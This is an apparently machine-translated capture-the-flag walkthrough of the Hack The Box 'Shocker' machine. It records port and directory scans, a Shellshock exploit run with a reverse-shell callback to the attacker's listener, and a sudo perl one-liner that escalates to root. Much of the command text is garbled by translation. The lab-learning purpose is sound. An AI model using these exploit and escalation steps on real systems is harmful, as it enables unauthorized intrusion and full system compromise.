disclaimer
The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.
Service to detect
Chrysene ─(root💀kali)-[~/ HTB /Shocker] ├ ─# nmap-SV -pn 10.10.10.56 -p-host discovery disabled (-pn). All addresses will be Starting Nmap 7.91 (https://nmap.org) at 2021-11-30 01:58 EST Nmap scan marked 'up' and scan times will be slower Report for 10.10.10.56 Host is up (0.35s latency). Not shown: 65533 Closed Ports PORT STATE SERVICE VERSION 80/ TCP open HTTP Apache HTTPD 2.4.18 ((Ubuntu)) 2222/ TCP open SSH OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; Protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) Scanned in 1015.68 secondsCopy the code
Port 80 opens with a simple page
Directory of blasting
─ ─ (root 💀 kali) - ~ / dirsearch └ ─ # python3 dirsearch. Py - e * t - 100 - u _ | http://10.10.10.56. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: / root/dirsearch/reports / 10.10.10.56 / _21-30 _02-11-12-39. TXT the Error Log: / root/dirsearch _02 / logs/errors - 21-11-30-12-39. The log Target: http://10.10.10.56/ [02:12:41] Starting: [02:14:06] 200 - 137B - /index.htmlCopy the code
There is only one static page, which is a bit depressing
Let’s try a more powerful dictionary:
Chrysene - (root💀kali)-[~/dirsearch] # python3 dirsearch.py -e* -t 100 -u http://10.10.10.56 -w The/usr/share/wordlists/Web Content/directory - the list - 2.3 - medium. TXT _ |. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/ _ (_ | | (_ |) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545 Output File: / root/dirsearch/reports / 10.10.10.56 _21-11-12-30 _02 18-19. TXT the Error Log: / root/dirsearch _02 / logs/errors - 21-11-30-19-12. The log Target: http://10.10.10.56/ [02:19:12] Starting: [02:31:53] 403 - 299B - /cgi-bin/ Task CompletedCopy the code
There is only one cgi-bin folder, and we use gobuster, specifying the.php,.sh,.html extensions to blow it up
└ ─ # gobuster dir - url http://10.10.10.56/cgi-bin/ - w/usr/share/wordlists/dirb/common TXT 30 - x - t. PHP,. Sh,. 1 ⨯ HTML = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Gobuster v3.1.0 by OJ Reeves (@ TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.56/cgi-bin/ [+] Method: GET [+] Threads: 30 [+] Wordlist: The/usr/share/wordlists/dirb/common TXT [+] Negative Status codes: 404 [+] User Agent: gobuster / 3.1.0 [+] Extensions: sh,html,php [+] Timeout: 10s =============================================================== 2021/11/30 05:45:13 Starting gobuster in directory enumeration mode =============================================================== /.htpasswd.html (Status: 403) [Size: 308] /.hta.php (Status: 403) [Size: 302] /.htaccess (Status: 403) [Size: 303] /.htpasswd (Status: 403) [Size: 303] /.hta.sh (Status: 403) [Size: 301] /.htaccess.php (Status: 403) [Size: 307] /.htaccess.sh (Status: 403) [Size: 306] /.hta.html (Status: 403) [Size: 303] /.htpasswd.php (Status: 403) [Size: 307] /.hta (Status: 403) [Size: 298] /.htpasswd.sh (Status: 403) [Size: 306] /.htaccess.html (Status: 403) [Size: 308] /user.sh (Status: 200) [Size: 118] =============================================================== 2021/11/30 05:48:46 Finished = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =Copy the code
A user. Sh file was found
This file cannot be accessed on a browser, but can be returned with the curl command
┌ ─ ─ (root 💀 kali) - ~ / HTB/Shocker └ ─ # curl - s http://10.10.10.56/cgi-bin/user.sh the content-type: Text /plain Just an uptime test script 05:48:43 UP 3:52, 0 Users, Load Average: 0.01, 0.03, 0.00Copy the code
Use Nikto to mine the script for potential vulnerability information
┌ ─ ─ (root 💀 kali) - ~ / HTB/Shocker └ ─ # nikto - h - http://10.10.10.56/cgi-bin/user.sh nikto v2.1.6 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + Target IP: 10.10.10.56 + Target Hostname: 10.10.10.56 + Target Port: 80 + Start Time: 2021-11-30 05:53:13 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking x-frame-options header is not present. + The X-xss-protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME Type + No CGI Directories found (use '-c all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (Current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch '93e4r0-cve-2014-6271' found, with contents: true + Uncommon header '93e4r0-cve-2014-6278' found, with contents: true + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /cgi-bin/user.sh/kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php + /cgi-bin/user.sh/lists/admin/: PHPList Pre 2.6.4 Contains a number of December including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist + /cgi-bin/user.sh/splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely. + /cgi-bin/user.sh/ssdefs/: Siteseed pre 1.4.2 has 'major' security problems. + /cgi-bin/user.sh/sshome/: Siteseed pre 1.4.2 has 'major' security problems. + /cgi-bin/user.sh/tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin + /cgi-bin/user.sh/tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/adminCopy the code
Version 2.4.18 appears to have cVE-2014-6271 and CVE-2014-6278 vulnerabilities
We found this script
Copy exp to local and execute the attack
Python exp. Py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4242 pages=”/cgi-bin/user.sh”
Get the initial shell
Chrysene ─(root💀kali)-[~/ HTB /Shocker] ├ ─# python exp. Py payload=reverse rhost= 10.10.10.56lhost = 10.10.14.15lport = 462 Pages = "/ cgi - bin/user. Sh" 1 ⨯ [!] Started reverse shell handler [-] Trying exploit on : /cgi-bin/user.sh [!] Successfully exploited [!] Incoming connection from 10.10.10.56 10.10.10.56> ID UID =1000(Shelly) GID =1000(shelly) Groups = 1000 (shelly), 4 (adm), 24 (cdrom), 30 (dip), 46 (plugdev), 110 (LXD), 115 (lpadmin), 116 (sambashare) 10.10.10.56 > whoami shellyCopy the code
Get user.txt in the home directory
Right to mention
See sudo privileges to use Perl without a password
10.10.10.56> sudo-l Matching Defaults entries for Shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perlCopy the code
Leverage perl to root
10.10.10.56> sudo perl -e 'exec "/bin/sh";'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)
10.10.10.56> whoami
root
Copy the code